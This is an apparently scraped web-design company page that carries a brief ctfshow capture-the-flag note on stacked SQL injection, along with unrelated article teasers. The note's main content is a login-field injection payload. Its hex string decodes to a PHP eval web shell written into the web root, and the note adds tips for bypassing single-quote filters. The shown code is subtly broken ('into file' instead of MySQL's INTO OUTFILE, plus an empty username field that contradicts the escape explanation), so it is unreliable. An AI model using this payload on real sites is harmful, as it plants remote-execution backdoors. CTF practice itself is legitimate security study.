乐山市网站建设_网站建设公司_网站建设_seo优化

首页 / 建站日记 / 乐山市网站建设_网站建设公司_网站建设_seo优化
乐山市网站建设_网站建设公司_网站建设_seo优化
2026/1/16 20:51:07 网站建设 项目流程

ctfshow-堆叠注入写Shell

看答案做了一下笔记

select * from account where username='' and password=''
单引号被禁用
username=
password=; select 0x3c3f706870206576616c28245f504f53545b315d293b3f3e into file "/var/www/html/shell.php";#

就变成了
select * from account where username='' and password='; select 0x3c3f706870206576616c28245f504f53545b315d293b3f3e into file "/var/www/html/shell.php";#'

MYSQL是这样进行理解的:
遇到了第一个', 开始找配对的另一个'
看到了', 被转义了, 不是MySQL所要的, 继续想后寻找
找到了, username='' and password='
这个时候,password的值就逃逸出来了:
; select 0x3c3f706870206576616c28245f504f53545b315d293b3f3e into file "/var/www/html/shell.php";#'
成功的执行了写入shell的操作

单引号绕过的两种手法:

  1. \转义
  2. 进制绕过
标签: 网站建设 企业官网 项目流程 UI设计 前端开发

热门文章

文章分类

标签云

网站建设 响应式设计 用户体验 SEO优化 前端开发 小程序 电商平台 性能优化

相关文章

您可能感兴趣的其他内容

大模型部署 tensor parallel vs 单个模型放一张GPU
2026/1/16 20:51:07 网站建设

大模型部署 tensor parallel vs 单个模型放一张GPU

目录一、先给最终结论(不绕弯)✅ 结论一:是不是 2 个模型服务?✅ 结论二:用 Tensor Parallel 还是“一卡一模型”?二、为什么「不能」用 Tensor Parallel(这是重点)1️⃣ Tensor Parallel 的本质成本2️⃣ TP …...

阅读更多 →
【图像去噪】基于matlab GUI均值+中值+高斯低通+硬阈值+软阈值+半软硬硬阈值+广义小波阈值图像去噪(含PSNR和MSE)【含Matlab源码 14956期】
2026/1/16 20:50:35 网站建设

【图像去噪】基于matlab GUI均值+中值+高斯低通+硬阈值+软阈值+半软硬硬阈值+广义小波阈值图像去噪(含PSNR和MSE)【含Matlab源码 14956期】

💥💥💥💥💥💥💞💞💞💞💞💞💞💞欢迎来到海神之光博客之家💞💞💞&#x1f49…...

阅读更多 →
Spring 事务嵌套 @Transational
2026/1/16 20:50:35 网站建设

Spring 事务嵌套 @Transational

Spring 事务嵌套: 异常:Transaction rolled back because it has been marked as rollback-only 原因:事务产生了嵌套,内部事务失败标记为rollback-only,但是异常捕获没有抛出,外层事务提交报错 解决方案…...

阅读更多 →

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询